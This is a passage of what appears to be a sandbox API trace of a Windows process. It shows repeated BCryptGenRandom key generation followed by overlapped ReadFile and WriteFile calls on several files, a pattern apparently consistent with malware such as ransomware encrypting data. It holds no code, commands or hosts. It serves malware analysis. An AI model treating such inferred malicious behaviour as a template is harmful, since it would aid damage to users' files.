cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0153.813] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0153.813] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0153.813] free (_Block=0x3e305b8) [0153.813] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0153.813] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0153.813] free (_Block=0x1fa91d0) [0153.813] free (_Block=0x1fa2ed8) [0153.813] free (_Block=0x1fa90b8) [0153.814] WriteFile (in: hFile=0x3cc, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0153.814] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.850] CloseHandle (hObject=0xec) returned 1 [0153.850] free (_Block=0x3e70008) [0153.850] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.874] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x1480, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0153.874] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.882] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.883] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.883] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0153.883] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.883] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.883] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0153.883] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0153.884] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0153.884] free (_Block=0x3e305b8) [0153.884] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0153.884] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0153.884] free (_Block=0x1fa91d0) [0153.884] free (_Block=0x1fa2ed8) [0153.884] free (_Block=0x1fa90b8) [0153.884] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0153.885] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0163.114] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x10d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0163.115] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0163.122] CloseHandle (hObject=0x308) returned 1 [0163.122] free (_Block=0x3e70008) [0163.122] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0163.130] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x27e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0163.133] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0163.135] CloseHandle (hObject=0x170) returned 1 [0163.135] free (_Block=0x3ef0008) [0163.135] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0163.136] WriteFile (in: hFile=0x2a4, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x440, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0163.136] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0163.192] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x474, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0163.192] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0163.193] CloseHandle (hObject=0x2a8) returned 1 [0163.193] free (_Block=0x1ff1e60) [0163.193] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0163.661] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.662] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.662] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0163.662] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.663] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.663] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0163.663] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0163.663] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0163.663] free (_Block=0x3e305b8) [0163.663] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0163.663] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0163.664] free (_Block=0x1fa91d0) [0163.664] free (_Block=0x77d7a8) [0163.664] free (_Block=0x1fa90b8) [0163.664] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0163.664] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0163.674] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x2a0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0163.674] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0163.675] CloseHandle (hObject=0x308) returned 1 [0163.675] free (_Block=0x3df0008) [0163.675] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0163.690] ReadFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x1fe8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0163.703] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0163.711] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.711] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.711] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0163.711] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.712] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.712] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0163.712] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0163.713] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0163.713] free (_Block=0x3e305b8) [0163.713] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0163.713] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0163.713] free (_Block=0x1fa91d0) [0163.713] free (_Block=0x1fa2ed8) [0163.713] free (_Block=0x1fa90b8) [0163.713] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0163.714] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0163.715] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x4820, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0163.715] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0163.716] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x7c50, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0163.716] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0164.168] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xd28, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0164.168] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0164.172] CloseHandle (hObject=0x2a4) returned 1 [0164.172] free (_Block=0x3df0008) [0164.172] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0164.174] WriteFile (in: hFile=0x2a8, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0xc80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0164.174] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0164.311] ReadFile (in: hFile=0x170, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0xcec, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0164.311] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0164.312] CloseHandle (hObject=0x170) returned 1 [0164.312] free (_Block=0x3f70048) [0164.312] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0164.316] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0164.317] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0164.317] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0164.317] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0164.317] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0164.317] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0164.318] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0164.318] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0164.318] free (_Block=0x3e305b8) [0164.318] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0164.318] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0164.318] free (_Block=0x1fa91d0) [0164.318] free (_Block=0x77d7a8) [0164.318] free (_Block=0x1fa90b8) [0164.318] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0164.319] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0164.331] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xbd8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0164.332] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0164.336] CloseHandle (hObject=0x2a8) returned 1 [0164.336] free (_Block=0x3df0008) [0164.336] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0164.362] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0164.362] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0164.362] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0164.362] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0164.363] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0164.363] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0164.363] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0164.363] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0164.363] free (_Block=0x3e305b8) [0164.363] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0164.363] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0164.364] free (_Block=0x1fa91d0) [0164.364] free (_Block=0x1fa2ed8) [0164.364] free (_Block=0x1fa90b8) [0164.364] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0164.364] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0164.364] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x950, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0164.364] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0164.404] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xc84, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0164.404] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0164.419] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xb2c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0164.419] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0164.491] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0xe70, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0164.491] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0164.509] WriteFile (in: hFile=0x2a4, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x1ea0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0164.509] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0164.511] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xd30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0164.511] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0165.078] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x2120, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0165.100] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0165.100] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.100] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.100] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0165.100] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.101] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.101] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0165.101] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0165.101] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0165.101] free (_Block=0x3e305b8) [0165.101] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0165.101] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0165.102] free (_Block=0x1fa91d0) [0165.102] free (_Block=0x1fa2ed8) [0165.102] free (_Block=0x1fa90b8) [0165.102] WriteFile (in: hFile=0x2a8, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0165.102] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0165.103] WriteFile (in: hFile=0x2a8, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x28f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0165.103] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0165.126] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb24, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0165.126] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0165.133] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x2fb8, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0165.138] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: 